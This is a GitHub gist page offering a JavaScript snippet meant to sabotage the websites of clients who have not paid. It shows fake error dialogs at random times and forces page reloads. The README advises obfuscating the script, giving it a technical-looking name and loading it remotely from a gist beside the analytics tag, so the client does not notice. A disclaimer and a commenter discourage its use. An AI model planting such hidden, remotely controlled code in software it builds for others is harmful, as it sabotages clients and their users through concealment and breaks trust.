Skip to content

Instantly share code, notes, and snippets.

@juanbrujo

juanbrujo/UntilYouPayMe.js

Last active December 15, 2016 14:15
Show Gist options
  • Save juanbrujo/5a1f6eaf610315eec6df66025d9e7a87 to your computer and use it in GitHub Desktop.
Save juanbrujo/5a1f6eaf610315eec6df66025d9e7a87 to your computer and use it in GitHub Desktop.
Download ZIP
Use this JavaScript function to annoy your clients that insist in not paying you.
Raw
UntilYouPayMe.js
(function(){
function randomErrors(){
var errorMessages = ['Unexpected Error!','Something happended, please try again'];
var randomMessage = errorMessages[Math.floor(Math.random() * errorMessages.length)];
var currentURL = (window.location != window.parent.location) ? document.referrer : document.location;
if (confirm( randomMessage )) {
window.location.reload(true);
} else {
window.location.reload(true);
}
}
var randomTime = Math.floor(Math.random() * 20000) + 10000;
var startAnnoying = (window.setTimeout(randomErrors, randomTime));
})();
Raw
UntilYouPayMe.md

UntilYouPayMe.js

Use this JavaScript function to annoy your clients that insist in not paying you.

This script will prompt an error message at a random time (from 10 sec to 60 sec) and any button user presses will reload the whole page.

Use:

Include this script in a way you can remove it if someone blocks your access to the server and make it not evident to catch. My suggestions:

  • obfuscate the code using this tool
  • call it directly from a GitHub gist. When needed just delete or empty the gist. Change the filename to something more technical. Any webapp, and add .min.js
  • call it next to Google Analytics script, so it can be easily hidden, like this:
var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.onload = function() {callFunctionFromScript();}
script.src = 'https://gist.githubusercontent.com/juanbrujo/5a1f6eaf610315eec6df66025d9e7a87/raw/228d898eef73f44ca3b3878328fc9decbb725345/UntilYouPayMe.js';head.appendChild(script);

Disclaimer:

Use at own risk. You agree that use of this script is at your own risk. The author does not make any warranty as to the results that may be obtained from use of this script or as to the accuracy, reliability or contents of any information provided through this website.

Always try to create a way to make an agreement first. The author does not recommend the use of this script at any circumstance.

License:

DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

@emartini
Copy link

unnecessary if or broken logic

  if (prompt === true) {
    window.location.reload(true);
  } else {
    window.location.reload(true);
  }

@chris-l
Copy link

chris-l commented Jun 1, 2016
edited
Loading

Agree with @emartini. And what the delay param does? You are not using it.

Put the entire script inside an IIFE, otherwise you are creating as global vars randomErrors, randomTime and startAnnoying.

You should know that jsnice.org is perfectly able to deobfuscate the strings (the error messages in this case) obfuscated by javascriptobfuscator.com (and the entire thing is pretty understandable once you pass it to jsnice)

BUT more importantly... I would recommend anyone to NOT use this script. Is not that hard to find out what is happening and this attack is not even sophisticated (is actually totally no-brainer), the chances that the client (yeah, perhaps not them, but some other coder they hire) finds out what are you doing with this script are high, and your reputation could get very damaged as result.

After all, IT IS totally unprofessional and low putting code like this inside a customer's project, even if the customer is not paying.

Just don't.

@juanbrujo
Copy link
Author

@chris-l thanks for your ind words. there's a disclaimer where I suggest the same point.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment